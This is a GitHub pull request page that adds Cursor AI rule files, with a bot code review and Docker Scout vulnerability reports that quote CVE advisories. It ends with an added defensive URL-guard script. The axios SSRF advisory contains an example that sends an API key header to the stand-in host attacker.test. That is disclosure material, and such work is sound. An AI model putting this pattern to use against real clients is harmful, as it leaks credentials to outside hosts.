
@anatolyshipitz
Collaborator

feat(rules): add code quality cursor rules

Description

This PR adds a set of code quality cursor rules to improve AI interactions and maintain consistency across the project.

Changes

  • Add no-apologies rule
  • Add no-summaries rule
  • Add no-unnecessary-confirmations rule
  • Add no-unnecessary-updates rule
  • Add preserve-existing-code rule
  • Add single-chunk-edits rule
  • Add verify-information rule

Impact

These rules will help:

  • Maintain consistent and high-quality AI interactions
  • Reduce unnecessary confirmations and updates
  • Preserve existing code and functionality
  • Ensure information is verified before presentation
  • Streamline the editing process with single-chunk edits

@coderabbitai

coderabbitai bot commented Apr 23, 2025

Walkthrough

A set of new documentation and rule files were added under the .cursor/rules/ directory, covering topics such as Conventional Commits, Docker configuration, project structure, service configuration, and several process and style rules. These rules address commit message standards, editing practices, information verification, and code preservation. The .gitignore file was also updated to refine ignored files and directories, particularly for IDE and system files, and to allow inclusion of .cursor/rules/ while ignoring other .cursor/ contents. The GitHub Actions workflow for code quality was updated to use a newer version of the SARIF upload action in the Docker Security Scanning job.

Changes

File(s) Change Summary
.cursor/rules/conventional-commits.mdc Added documentation specifying Conventional Commit Message standards, including commit structure, allowed types, semantic versioning correlation, and examples.
.cursor/rules/docker-configuration.mdc Added Docker Configuration Guide detailing service setup, Docker images, volumes, network, and port mappings.
.cursor/rules/project-structure.mdc Added project structure documentation outlining repository architecture, key components, and service ports.
.cursor/rules/service-configuration.mdc Added service configuration guide with setup instructions, health checks, access URLs, and troubleshooting steps.
.cursor/rules/no-apologies-rule.mdc
.cursor/rules/no-summaries-rule.mdc
.cursor/rules/no-unnecessary-confirmations-rule.mdc
.cursor/rules/no-unnecessary-updates-rule.mdc
.cursor/rules/preserve-existing-code-rule.mdc
.cursor/rules/single-chunk-edits-rule.mdc
.cursor/rules/verify-information-rule.mdc
Added various rule files specifying process and style guidelines, such as prohibiting apologies, summaries, unnecessary confirmations, unnecessary updates, enforcing code preservation, single-chunk edits, and information verification.
.gitignore Refined ignore patterns for IDE, system, and cache files; adjusted rules to allow .cursor/rules/ but ignore other .cursor/ contents.
.github/workflows/code-quality.yml Updated the Docker Security Scanning job to use version 3 of the github/codeql-action/upload-sarif action instead of version 2.

Sequence Diagram(s)

sequenceDiagram
    participant Developer
    participant Repo
    participant RulesEngine

    Developer->>Repo: Add/commit files and documentation
    Repo->>RulesEngine: Apply .cursor/rules/* rules on commit, edit, and review
    RulesEngine-->>Developer: Enforce commit message standards, editing practices, info verification, etc.


📜 Recent review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 509dd04 and b588652.

📒 Files selected for processing (1)
  • .github/workflows/code-quality.yml (1 hunks)
🚧 Files skipped from review as they are similar to previous changes (1)
  • .github/workflows/code-quality.yml
⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

🪧 Tips

Chat

There are 3 ways to chat with CodeRabbit:

  • Review comments: Directly reply to a review comment made by CodeRabbit. Example:
    • I pushed a fix in commit <commit_id>, please review it.
    • Generate unit testing code for this file.
    • Open a follow-up GitHub issue for this discussion.
  • Files and specific lines of code (under the "Files changed" tab): Tag @coderabbitai in a new review comment at the desired location with your query. Examples:
    • @coderabbitai generate unit testing code for this file.
    • @coderabbitai modularize this function.
  • PR comments: Tag @coderabbitai in a new PR comment to ask questions about the PR branch. For the best results, please provide a very specific query, as very limited context is provided in this mode. Examples:
    • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
    • @coderabbitai read src/utils.ts and generate unit testing code.
    • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
    • @coderabbitai help me debug CodeRabbit configuration file.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

  • @coderabbitai pause to pause the reviews on a PR.
  • @coderabbitai resume to resume the paused reviews.
  • @coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
  • @coderabbitai full review to do a full review from scratch and review all the files again.
  • @coderabbitai summary to regenerate the summary of the PR.
  • @coderabbitai generate docstrings to generate docstrings for this PR.
  • @coderabbitai generate sequence diagram to generate a sequence diagram of the changes in this PR.
  • @coderabbitai resolve resolve all the CodeRabbit review comments.
  • @coderabbitai configuration to show the current CodeRabbit configuration for the repository.
  • @coderabbitai help to get help.

Other keywords and placeholders

  • Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
  • Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
  • Add @coderabbitai anywhere in the PR title to generate the title automatically.

CodeRabbit Configuration File (.coderabbit.yaml)

  • You can programmatically configure CodeRabbit by adding a .coderabbit.yaml file to the root of your repository.
  • Please see the configuration documentation for more information.
  • If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json

Documentation and Community

  • Visit our Documentation for detailed information on how to use CodeRabbit.
  • Join our Discord Community to get help, request features, and share feedback.
  • Follow us on X/Twitter for updates and announcements.

@github-actions

github-actions bot commented Apr 23, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference: n8n-test:latest
digest: sha256:03e1afaf63dbdec8f0d1ee90ffa1977582ce467562192944b35549a143019068
vulnerabilities: critical: 1, high: 4, medium: 2, low: 0
platform: linux/amd64
size: 243 MB
packages: 1628
📦 Base Image: node:20-alpine
also known as:
  • 20-alpine3.21
  • 20.19-alpine
  • 20.19-alpine3.21
  • 20.19.0-alpine
  • 20.19.0-alpine3.21
  • iron-alpine
  • iron-alpine3.21
digest: sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilities: critical: 0, high: 1, medium: 0, low: 0

critical: 1 high: 0 medium: 0 low: 0 stdlib 1.24.0 (golang)

pkg:golang/stdlib@1.24.0

critical: CVE-2025-22871

Affected range: >=1.24.0-0, <1.24.2
Fixed version: 1.24.2
EPSS Score: 0.015%
EPSS Percentile: 2nd percentile
Description

The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

critical: 0 high: 1 medium: 0 low: 0 semver 5.3.0 (npm)

pkg:npm/semver@5.3.0

high 7.5: CVE-2022-25883 Inefficient Regular Expression Complexity

Affected range: <5.7.2
Fixed version: 5.7.2
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.308%
EPSS Percentile: 53rd percentile
Description

Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

critical: 0 high: 1 medium: 0 low: 0 pdfjs-dist 2.16.105 (npm)

pkg:npm/pdfjs-dist@2.16.105

high 8.8: CVE-2024-4367

Affected range: <=4.1.392
Fixed version: 4.2.67
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 14.484%
EPSS Percentile: 94th percentile
Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

critical: 0 high: 1 medium: 0 low: 0 cross-spawn 7.0.3 (npm)

pkg:npm/cross-spawn@7.0.3

high 7.5: CVE-2024-21538 Inefficient Regular Expression Complexity

Affected range: >=7.0.0, <7.0.5
Fixed version: 7.0.5
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.132%
EPSS Percentile: 34th percentile
Description

Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

critical: 0 high: 1 medium: 0 low: 0 axios 1.7.4 (npm)

pkg:npm/axios@1.7.4

high 7.7: CVE-2025-27152 Server-Side Request Forgery (SSRF)

Affected range: >=1.0.0, <1.8.2
Fixed version: 1.8.2
CVSS Score: 7.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
EPSS Score: 0.056%
EPSS Percentile: 18th percentile
Description

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:

     mkdir /tmp/server1 /tmp/server2
     echo "this is server1" > /tmp/server1/index.html
     echo "this is server2" > /tmp/server2/index.html
     python -m http.server -d /tmp/server1 10001 &
     python -m http.server -d /tmp/server2 10002 &

  2. Create a script (e.g., main.js):

     import axios from "axios";
     const client = axios.create({ baseURL: "http://localhost:10001/" });
     const response = await client.get("http://localhost:10002/");
     console.log(response.data);

  3. Run the script:

     $ node main.js
     this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

critical: 0 high: 0 medium: 1 low: 0 @azure/identity 3.4.2 (npm)

pkg:npm/%40azure/identity@3.4.2

medium 6.8: CVE-2024-35255 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Affected range: <4.2.1
Fixed version: 4.2.1
CVSS Score: 6.8
CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.116%
EPSS Percentile: 32nd percentile
Description

Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability.

critical: 0 high: 0 medium: 1 low: 0 snowflake-sdk 1.12.0 (npm)

pkg:npm/snowflake-sdk@1.12.0

medium 4.4: CVE-2025-24791 Improper Preservation of Permissions

Affected range: >=1.12.0, <=2.0.1
Fixed version: 2.0.2
CVSS Score: 4.4
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
EPSS Score: 0.012%
EPSS Percentile: 1st percentile
Description

Issue

Snowflake discovered and remediated a vulnerability in the Snowflake NodeJS Driver. File permissions checks of the temporary credential cache could be bypassed by an attacker with write access to the local cache directory.

This vulnerability affects versions 1.12.0 through 2.0.1 on Linux. Snowflake fixed the issue in version 2.0.2.

Vulnerability Details

On Linux, when either EXTERNALBROWSER or USERNAME_PASSWORD_MFA authentication methods are used with temporary credential caching enabled, the Snowflake NodeJS Driver will cache temporary credentials in a local file. Due to a bug, the check verifying that the cache file can be accessed only by the user running the Driver always succeeded, but didn’t verify the permissions or the ownership correctly. An attacker with write access to the local cache folder could plant an empty file there and the Driver would use it to store temporary credentials instead of rejecting it due to overly broad permissions.

Solution

Snowflake released version 2.0.2 of the Snowflake NodeJS Driver, which fixes this issue. We recommend users upgrade to version 2.0.2.

Additional Information

If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our Vulnerability Disclosure Policy.

@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 11

🧹 Nitpick comments (8)
.cursor/rules/service-configuration.mdc (5)

1-5: Populate front matter metadata
The YAML front matter has empty description and globs fields, which reduces discoverability and may confuse tooling that relies on these values. Consider adding a concise summary under description and listing any relevant file patterns under globs (or removing them if not needed).


9-12: Clarify link formatting for the setup script
The link [scripts/setup_volumes.sh](mdc:scripts/setup_volumes.sh) uses a custom mdc: scheme. If your renderer doesn’t support it, switch to a standard relative path link (for example, [scripts/setup_volumes.sh](../scripts/setup_volumes.sh)) or document the custom protocol.


14-20: Include sample invocation for health checks
Listing the endpoints is helpful, but users may benefit from seeing how to invoke the verification script. For example, wrap bash scripts/check_services.sh in a code block and show a snippet of expected output or typical error messages.


27-27: Specify container/service name for logs
The instruction docker logs is incomplete—it requires a container name or ID. For Docker Compose environments, consider docker compose logs -f <service> or explicitly docker logs <container> to guide the user.


30-31: Reference the setup script explicitly or merge steps
Step 4 (“Run setup script for volume mount issues”) duplicates the earlier setup instructions. Either point directly to ./scripts/setup_volumes.sh here or merge this step with the initial “Setup Instructions” to avoid redundancy.

.cursor/rules/conventional-commits.mdc (3)

6-9: Add direct link to the Conventional Commits spec
Rather than referring generically, embed a hyperlink to the official specification. For example:

Use the [Conventional Commits](https://conventionalcommits.org/) specification to generate commit messages.

12-18: Specify language for the code block
The commit message structure is enclosed in triple backticks without a language. For better syntax highlighting, declare it as e.g.

<type>[optional scope]: <description>
…

22-26: Standardize bullet formatting for commit types
The first three list items include the colon inside backticks (e.g., `fix`:) while the “Other allowed types” line embeds colons in each type. Align these—for example, remove trailing colons within the code ticks or make all types consistent.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between d512f88 and 6e98ef2.

📒 Files selected for processing (12)
  • .cursor/rules/conventional-commits.mdc (1 hunks)
  • .cursor/rules/docker-configuration.mdc (1 hunks)
  • .cursor/rules/no-apologies-rule.mdc (1 hunks)
  • .cursor/rules/no-summaries-rule.mdc (1 hunks)
  • .cursor/rules/no-unnecessary-confirmations-rule.mdc (1 hunks)
  • .cursor/rules/no-unnecessary-updates-rule.mdc (1 hunks)
  • .cursor/rules/preserve-existing-code-rule.mdc (1 hunks)
  • .cursor/rules/project-structure.mdc (1 hunks)
  • .cursor/rules/service-configuration.mdc (1 hunks)
  • .cursor/rules/single-chunk-edits-rule.mdc (1 hunks)
  • .cursor/rules/verify-information-rule.mdc (1 hunks)
  • .gitignore (1 hunks)
⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (1)
.gitignore (1)

10-16: Standard IDE and OS artifacts ignored
The added patterns (.idea/, .vscode/, *.swp, *.swo, and .DS_Store) correctly exclude common IDE and temporary files. This aligns with best practices for cross-platform development.

@anatolyshipitz anatolyshipitz self-assigned this Apr 23, 2025
@anatolyshipitz anatolyshipitz enabled auto-merge (squash) April 23, 2025 14:41
@anatolyshipitz anatolyshipitz removed the request for review from killev April 24, 2025 07:52
- Add no-apologies rule
- Add no-summaries rule
- Add no-unnecessary-confirmations rule
- Add no-unnecessary-updates rule
- Add preserve-existing-code rule
- Add single-chunk-edits rule
- Add verify-information rule

These rules will help maintain consistent and high-quality AI interactions in the project.
- Added a guideline to always verify information before presenting it, emphasizing the importance of clear evidence over speculation.
- Enhanced multiple rules by adding clear descriptions to improve understanding of their purpose.
- Updated glob patterns for each rule to specify applicable file types, ensuring better application of the rules across the project.
Update .gitignore to include all subdirectories under .cursor/rules by changing
'!.cursor/rules/' to '!.cursor/rules/**'
@anatolyshipitz anatolyshipitz force-pushed the feature/add-cursor-rules branch from 363a1be to f937582 April 24, 2025 08:10
This change sets environment variables for Docker Scout using GitHub Secrets. It ensures authenticated scanning of images for vulnerabilities, improving the reliability of the workflow.
anatolyshipitz and others added 2 commits April 24, 2025 10:57
* Update github/codeql-action from v2 to v3 to address deprecation warning
* Remove redundant Docker Scout authentication env vars since they're inherited from docker/login-action

BREAKING CHANGE: CodeQL Action v2 support will be removed in January 2025
@anatolyshipitz anatolyshipitz disabled auto-merge April 24, 2025 15:25
@anatolyshipitz anatolyshipitz enabled auto-merge (squash) April 24, 2025 15:28
@anatolyshipitz anatolyshipitz disabled auto-merge April 24, 2025 15:28

@github-actions

github-actions bot commented Apr 24, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference: n8n-test:latest
digest: sha256:5d0968306cfd5c6b1cac8fc4ddaabe692c35b0fd8e81dc8b56a6ab9755dabdc7
vulnerabilities: critical: 1, high: 4, medium: 0, low: 0
platform: linux/amd64
size: 243 MB
packages: 1628
📦 Base Image: node:20-alpine
also known as:
  • 20-alpine3.21
  • 20.19-alpine
  • 20.19-alpine3.21
  • 20.19.0-alpine
  • 20.19.0-alpine3.21
  • iron-alpine
  • iron-alpine3.21
digest: sha256:37a5a350292926f98d48de9af160b0a3f7fcb141566117ee452742739500a5bd
vulnerabilities: critical: 0, high: 1, medium: 0, low: 0

critical: 1 high: 0 medium: 0 low: 0 stdlib 1.24.0 (golang)

pkg:golang/stdlib@1.24.0

critical: CVE-2025-22871

Affected range: >=1.24.0-0, <1.24.2
Fixed version: 1.24.2
EPSS Score: 0.015%
EPSS Percentile: 2nd percentile
Description

The net/http package improperly accepts a bare LF as a line terminator in chunked data chunk-size lines. This can permit request smuggling if a net/http server is used in conjunction with a server that incorrectly accepts a bare LF as part of a chunk-ext.

critical: 0 high: 1 medium: 0 low: 0 axios 1.7.4 (npm)

pkg:npm/axios@1.7.4

high 7.7: CVE-2025-27152 Server-Side Request Forgery (SSRF)

Affected range: >=1.0.0, <1.8.2
Fixed version: 1.8.2
CVSS Score: 7.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
EPSS Score: 0.056%
EPSS Percentile: 18th percentile
Description

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:

     mkdir /tmp/server1 /tmp/server2
     echo "this is server1" > /tmp/server1/index.html
     echo "this is server2" > /tmp/server2/index.html
     python -m http.server -d /tmp/server1 10001 &
     python -m http.server -d /tmp/server2 10002 &

  2. Create a script (e.g., main.js):

     import axios from "axios";
     const client = axios.create({ baseURL: "http://localhost:10001/" });
     const response = await client.get("http://localhost:10002/");
     console.log(response.data);

  3. Run the script:

     $ node main.js
     this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

critical: 0 high: 1 medium: 0 low: 0 semver 5.3.0 (npm)

pkg:npm/semver@5.3.0

high 7.5: CVE-2022-25883 Inefficient Regular Expression Complexity

Affected range: <5.7.2
Fixed version: 5.7.2
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.308%
EPSS Percentile: 53rd percentile
Description

Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.

critical: 0 high: 1 medium: 0 low: 0 pdfjs-dist 2.16.105 (npm)

pkg:npm/pdfjs-dist@2.16.105

high 8.8: CVE-2024-4367

Affected range: <=4.1.392
Fixed version: 4.2.67
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 14.484%
EPSS Percentile: 94th percentile
Description

Impact

If pdf.js is used to load a malicious PDF, and PDF.js is configured with isEvalSupported set to true (which is the default value), unrestricted attacker-controlled JavaScript will be executed in the context of the hosting domain.

Patches

The patch removes the use of eval:
mozilla/pdf.js#18015

Workarounds

Set the option isEvalSupported to false.

References

https://bugzilla.mozilla.org/show_bug.cgi?id=1893645

critical: 0 high: 1 medium: 0 low: 0 cross-spawn 7.0.3 (npm)

pkg:npm/cross-spawn@7.0.3

high 7.5: CVE-2024-21538 Inefficient Regular Expression Complexity

Affected range: >=7.0.0, <7.0.5
Fixed version: 7.0.5
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.132%
EPSS Percentile: 34th percentile
Description

Versions of the package cross-spawn before 7.0.5 are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
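The axios advisory (CVE-2025-27152) quoted in both scan reports above recommends two checks for any client that combines a configured baseURL with caller-supplied path data: an absolute URL must not silently replace baseURL, and the final URL must still begin with baseURL before the request goes out. The block below is an added example, not code from the advisory, from axios, or from this repository; it implements those two checks as a standalone guard using only the WHATWG URL parser, so it runs offline and can sit in front of any HTTP client. The names safeResolve, BaseUrlViolation, isAbsoluteUrl and classifyPaths are assumptions for this example, and the sample base and paths are constructed (example.test and attacker.test are reserved documentation names). It goes slightly beyond the advisory by also rejecting protocol-relative input and "../" traversal that escapes the base path.

```javascript
// Added example: enforce "the resolved URL must still begin with baseURL"
// before any request is sent. Not axios code; names below are assumptions.

class BaseUrlViolation extends Error {
  constructor(message) {
    super(message);
    this.name = "BaseUrlViolation";
  }
}

// True when `candidate` parses as an absolute URL on its own (it carries a
// scheme, e.g. "http://attacker.test/"). A relative path throws in the WHATWG
// parser when no base is supplied, which is the behaviour relied on here.
function isAbsoluteUrl(candidate) {
  try {
    new URL(candidate);
    return true;
  } catch (_) {
    return false;
  }
}

// Combine baseURL with a caller-supplied path and return the final URL only if
// it keeps baseURL's origin and stays under baseURL's path. Otherwise throw
// BaseUrlViolation so the caller never sends the request.
function safeResolve(baseURL, userPath) {
  if (typeof userPath !== "string") {
    throw new BaseUrlViolation("path must be a string");
  }
  const base = new URL(baseURL);
  // Treat the base path as a directory so a prefix check on "/api/v1" cannot
  // be satisfied by a sibling such as "/api/v1-admin".
  const basePath = base.pathname.endsWith("/") ? base.pathname : base.pathname + "/";

  // Advisory recommendation 1: an absolute URL (or a protocol-relative "//host"
  // form) must not replace baseURL. Reject instead of silently rewriting.
  if (isAbsoluteUrl(userPath) || /^[\\/]{2}/.test(userPath)) {
    throw new BaseUrlViolation(`absolute or protocol-relative URL rejected: ${userPath}`);
  }

  // Join like a typical baseURL + path client does (strip leading slashes so
  // "/123" does not jump to the site root), then let the parser normalise dot
  // segments such as "../".
  const joined = new URL(basePath + userPath.replace(/^[\\/]+/, ""), base.origin);

  // Advisory recommendation 2: after combining, the result must still begin
  // with baseURL (same origin, path under basePath). This is what catches
  // "../" traversal, which the absolute-URL check above does not see.
  if (joined.origin !== base.origin || !joined.pathname.startsWith(basePath)) {
    throw new BaseUrlViolation(`resolved URL escapes baseURL: ${joined.href}`);
  }
  return joined.href;
}

// Classify a batch of candidate paths without sending anything. Useful as a
// unit test for the guard or for reviewing path values seen in request logs.
function classifyPaths(baseURL, paths) {
  return paths.map((p) => {
    try {
      return { path: p, allowed: true, url: safeResolve(baseURL, p) };
    } catch (err) {
      if (err instanceof BaseUrlViolation) {
        return { path: p, allowed: false, reason: err.message };
      }
      throw err;
    }
  });
}

// Constructed sample inputs mirroring the advisory's scenario.
const SAMPLE_BASE = "http://example.test/api/v1/users/";
const SAMPLE_PATHS = [
  "123",                   // ordinary id: allowed
  "/123",                  // leading slash: still joined under the base
  "123?expand=roles#top",  // query and fragment preserved: allowed
  "http://attacker.test/", // the advisory's SSRF input: blocked
  "//attacker.test/",      // protocol-relative variant: blocked
  "../../admin",           // traversal out of baseURL: blocked
];

console.table(classifyPaths(SAMPLE_BASE, SAMPLE_PATHS));
```

Running the block prints one row per sample path with either the URL that would be requested or the reason it was blocked; the three attacker-style inputs never produce a URL. The guard deliberately rejects absolute input rather than prefixing it onto baseURL, because a request to "…/users/http://attacker.test/" is almost never what the caller meant and a loud failure is easier to spot in logs than a silently rewritten URL.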

@anatolyshipitz anatolyshipitz merged commit 71a8008 into main Apr 24, 2025
12 of 16 checks passed
@anatolyshipitz anatolyshipitz deleted the feature/add-cursor-rules branch April 24, 2025 16:43